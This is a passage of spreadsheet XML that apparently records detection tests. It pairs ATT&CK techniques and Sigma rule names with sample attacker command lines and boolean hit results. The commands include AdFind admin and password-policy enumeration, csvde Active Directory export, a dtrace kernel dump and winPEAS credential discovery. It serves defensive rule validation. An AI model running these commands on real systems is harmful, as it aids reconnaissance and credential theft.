      <c r="E1505" s="43" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg | findstr /v "error"</t>
        </is>
      </c>
      <c r="F1505" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1505" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1505" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1505" s="43" t="n"/>
      <c r="J1505" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1505" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1506" ht="15.75" customHeight="1" s="42">
      <c r="A1506" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B1506" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_aadinternals_cmdlets_execution</t>
        </is>
      </c>
      <c r="C1506" s="43" t="inlineStr">
        <is>
          <t>AADInternals PowerShell Cmdlets Execution - ProccessCreation</t>
        </is>
      </c>
      <c r="D1506" s="43" t="inlineStr">
        <is>
          <t>c86500e9-a645-4680-98d7-f882c70c1ea3</t>
        </is>
      </c>
      <c r="E1506" s="43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F1506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1506" s="43" t="n"/>
      <c r="J1506" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1506" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1507" ht="15.75" customHeight="1" s="42">
      <c r="A1507" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B1507" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_aadinternals_cmdlets_execution</t>
        </is>
      </c>
      <c r="C1507" s="43" t="inlineStr">
        <is>
          <t>AADInternals PowerShell Cmdlets Execution - ProccessCreation</t>
        </is>
      </c>
      <c r="D1507" s="43" t="inlineStr">
        <is>
          <t>c86500e9-a645-4680-98d7-f882c70c1ea3</t>
        </is>
      </c>
      <c r="E1507" s="43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F1507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1507" s="43" t="n"/>
      <c r="J1507" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1507" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1508" ht="15.75" customHeight="1" s="42">
      <c r="A1508" s="43" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1508" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1508" s="43" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1508" s="43" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1508" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /v /c "set a=chcp&amp;&amp; !a!"</t>
        </is>
      </c>
      <c r="F1508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1508" s="43" t="n"/>
      <c r="J1508" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1508" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1509" ht="15.75" customHeight="1" s="42">
      <c r="A1509" s="43" t="inlineStr">
        <is>
          <t>t1217</t>
        </is>
      </c>
      <c r="B1509" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dir_execution</t>
        </is>
      </c>
      <c r="C1509" s="43" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command</t>
        </is>
      </c>
      <c r="D1509" s="43" t="inlineStr">
        <is>
          <t>7c9340a9-e2ee-4e43-94c5-c54ebbea1006</t>
        </is>
      </c>
      <c r="E1509" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c dir c:\ /s &gt;&gt; %temp%\T1083Test1.txt</t>
        </is>
      </c>
      <c r="F1509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1509" s="43" t="n"/>
      <c r="J1509" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1509" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1510" ht="15.75" customHeight="1" s="42">
      <c r="A1510" s="43" t="inlineStr">
        <is>
          <t>t1217</t>
        </is>
      </c>
      <c r="B1510" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dir_execution</t>
        </is>
      </c>
      <c r="C1510" s="43" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command</t>
        </is>
      </c>
      <c r="D1510" s="43" t="inlineStr">
        <is>
          <t>7c9340a9-e2ee-4e43-94c5-c54ebbea1006</t>
        </is>
      </c>
      <c r="E1510" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c dir /s c:\ &gt;&gt; %TEMP%\T1083Test1.txt</t>
        </is>
      </c>
      <c r="F1510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1510" s="43" t="n"/>
      <c r="J1510" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1510" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1511" ht="15.75" customHeight="1" s="42">
      <c r="A1511" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1511" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C1511" s="43" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D1511" s="43" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E1511" s="43" t="inlineStr">
        <is>
          <t>csvde.exe -f C:\Users\Public\ad_export.csv</t>
        </is>
      </c>
      <c r="F1511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1511" s="43" t="n"/>
      <c r="J1511" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1511" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1512" ht="15.75" customHeight="1" s="42">
      <c r="A1512" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1512" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C1512" s="43" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D1512" s="43" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E1512" s="43" t="inlineStr">
        <is>
          <t>csvde.exe -f C:\Users\Public\ad_export.csv -i</t>
        </is>
      </c>
      <c r="F1512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1512" s="43" t="n"/>
      <c r="J1512" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1512" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1513" ht="15.75" customHeight="1" s="42">
      <c r="A1513" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1513" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C1513" s="43" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D1513" s="43" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E1513" s="43" t="inlineStr">
        <is>
          <t>csvde.exe -f C:\Users\Public\ad_export.csv -i -f C:\Users\Public\real_export.csv</t>
        </is>
      </c>
      <c r="F1513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1513" s="43" t="n"/>
      <c r="J1513" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1513" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1514" ht="15.75" customHeight="1" s="42">
      <c r="A1514" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1514" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_enumeration</t>
        </is>
      </c>
      <c r="C1514" s="43" t="inlineStr">
        <is>
          <t>PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE</t>
        </is>
      </c>
      <c r="D1514" s="43" t="inlineStr">
        <is>
          <t>455b9d50-15a1-4b99-853f-8d37655a4c1b</t>
        </is>
      </c>
      <c r="E1514" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties</t>
        </is>
      </c>
      <c r="F1514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1514" s="43" t="n"/>
      <c r="J1514" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1514" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1515" ht="15.75" customHeight="1" s="42">
      <c r="A1515" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1515" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_enumeration</t>
        </is>
      </c>
      <c r="C1515" s="43" t="inlineStr">
        <is>
          <t>PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE</t>
        </is>
      </c>
      <c r="D1515" s="43" t="inlineStr">
        <is>
          <t>455b9d50-15a1-4b99-853f-8d37655a4c1b</t>
        </is>
      </c>
      <c r="E1515" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -sc admincountdmp</t>
        </is>
      </c>
      <c r="F1515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1515" s="43" t="n"/>
      <c r="J1515" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1515" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1516" ht="15.75" customHeight="1" s="42">
      <c r="A1516" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1516" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_enumeration</t>
        </is>
      </c>
      <c r="C1516" s="43" t="inlineStr">
        <is>
          <t>PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE</t>
        </is>
      </c>
      <c r="D1516" s="43" t="inlineStr">
        <is>
          <t>455b9d50-15a1-4b99-853f-8d37655a4c1b</t>
        </is>
      </c>
      <c r="E1516" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -sc exchaddresses</t>
        </is>
      </c>
      <c r="F1516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1516" s="43" t="n"/>
      <c r="J1516" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1516" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1517" ht="15.75" customHeight="1" s="42">
      <c r="A1517" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1517" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_enumeration</t>
        </is>
      </c>
      <c r="C1517" s="43" t="inlineStr">
        <is>
          <t>PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE</t>
        </is>
      </c>
      <c r="D1517" s="43" t="inlineStr">
        <is>
          <t>455b9d50-15a1-4b99-853f-8d37655a4c1b</t>
        </is>
      </c>
      <c r="E1517" s="43" t="inlineStr">
        <is>
          <t>adfind.exe -sc admincountdmp</t>
        </is>
      </c>
      <c r="F1517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1517" s="43" t="n"/>
      <c r="J1517" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1517" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1518" ht="15.75" customHeight="1" s="42">
      <c r="A1518" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1518" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_enumeration</t>
        </is>
      </c>
      <c r="C1518" s="43" t="inlineStr">
        <is>
          <t>PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE</t>
        </is>
      </c>
      <c r="D1518" s="43" t="inlineStr">
        <is>
          <t>455b9d50-15a1-4b99-853f-8d37655a4c1b</t>
        </is>
      </c>
      <c r="E1518" s="43" t="inlineStr">
        <is>
          <t>adfind.exe -sc exchaddresses</t>
        </is>
      </c>
      <c r="F1518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1518" s="43" t="n"/>
      <c r="J1518" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1518" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1519" ht="15.75" customHeight="1" s="42">
      <c r="A1519" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1519" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1519" s="43" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1519" s="43" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1519" s="43" t="inlineStr">
        <is>
          <t>powershell.exe Invoke-Command -ScriptBlock { Start-Process 'cmd.exe' -ArgumentList '/c echo Success' }</t>
        </is>
      </c>
      <c r="F1519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1519" s="43" t="n"/>
      <c r="J1519" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1519" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1520" ht="15.75" customHeight="1" s="42">
      <c r="A1520" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1520" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1520" s="43" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1520" s="43" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1520" s="43" t="inlineStr">
        <is>
          <t>dtrace.exe -w -n "syscall:::return {lkd(0); exit(0);} "</t>
        </is>
      </c>
      <c r="F1520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1520" s="43" t="n"/>
      <c r="J1520" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1520" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1521" ht="15.75" customHeight="1" s="42">
      <c r="A1521" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1521" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1521" s="43" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1521" s="43" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1521" s="43" t="inlineStr">
        <is>
          <t>dtrace.exe -w -n syscall:::return\ {lkd(0); exit(0);}</t>
        </is>
      </c>
      <c r="F1521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1521" s="43" t="n"/>
      <c r="J1521" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1521" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1522" ht="15.75" customHeight="1" s="42">
      <c r="A1522" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1522" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1522" s="43" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1522" s="43" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1522" s="43" t="inlineStr">
        <is>
          <t>dtrace.exe -w -n 'syscall:::return {lkd(0); exit(0);}'</t>
        </is>
      </c>
      <c r="F1522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1522" s="43" t="n"/>
      <c r="J1522" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1522" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1523" ht="15.75" customHeight="1" s="42">
      <c r="A1523" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1523" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1523" s="43" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1523" s="43" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1523" s="43" t="inlineStr">
        <is>
          <t>dtrace.exe -w -n syscall:::return {lkd(0); exit(0);}</t>
        </is>
      </c>
      <c r="F1523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1523" s="43" t="n"/>
      <c r="J1523" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1523" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1524" ht="15.75" customHeight="1" s="42">
      <c r="A1524" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1524" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1524" s="43" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1524" s="43" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1524" s="43" t="inlineStr">
        <is>
          <t>dtrace.exe -n -w "syscall:::return {lkd(0); exit(0);} "</t>
        </is>
      </c>
      <c r="F1524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1524" s="43" t="n"/>
      <c r="J1524" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1524" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1525" ht="15.75" customHeight="1" s="42">
      <c r="A1525" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1525" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1525" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1525" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1525" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe applicationsinfo</t>
        </is>
      </c>
      <c r="F1525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1525" s="43" t="n"/>
      <c r="J1525" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1525" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1526" ht="15.75" customHeight="1" s="42">
      <c r="A1526" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1526" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1526" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1526" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1526" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe --applicationsinfo</t>
        </is>
      </c>
      <c r="F1526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1526" s="43" t="n"/>
      <c r="J1526" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1526" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1527" ht="15.75" customHeight="1" s="42">
      <c r="A1527" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1527" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1527" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1527" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1527" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe fileanalysis</t>
        </is>
      </c>
      <c r="F1527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1527" s="43" t="n"/>
      <c r="J1527" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1527" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1528" ht="15.75" customHeight="1" s="42">
      <c r="A1528" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1528" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1528" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1528" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1528" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe  file analysis</t>
        </is>
      </c>
      <c r="F1528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1528" s="43" t="n"/>
      <c r="J1528" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1528" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1529" ht="15.75" customHeight="1" s="42">
      <c r="A1529" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1529" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1529" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1529" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1529" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe --fileanalysis</t>
        </is>
      </c>
      <c r="F1529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1529" s="43" t="n"/>
      <c r="J1529" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1529" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1530" ht="15.75" customHeight="1" s="42">
      <c r="A1530" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1530" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1530" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1530" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1530" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe servicesinfo</t>
        </is>
      </c>
      <c r="F1530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1530" s="43" t="n"/>
      <c r="J1530" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1530" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1531" ht="15.75" customHeight="1" s="42">
      <c r="A1531" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1531" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1531" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1531" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1531" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe  services info</t>
        </is>
      </c>
      <c r="F1531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1531" s="43" t="n"/>
      <c r="J1531" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1531" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1532" ht="15.75" customHeight="1" s="42">
      <c r="A1532" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1532" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1532" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1532" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1532" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe --servicesinfo</t>
        </is>
      </c>
      <c r="F1532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1532" s="43" t="n"/>
      <c r="J1532" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1532" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1533" ht="15.75" customHeight="1" s="42">
      <c r="A1533" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1533" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1533" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1533" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1533" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe windowscreds</t>
        </is>
      </c>
      <c r="F1533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1533" s="43" t="b">
        <v>0</v>
      </c>
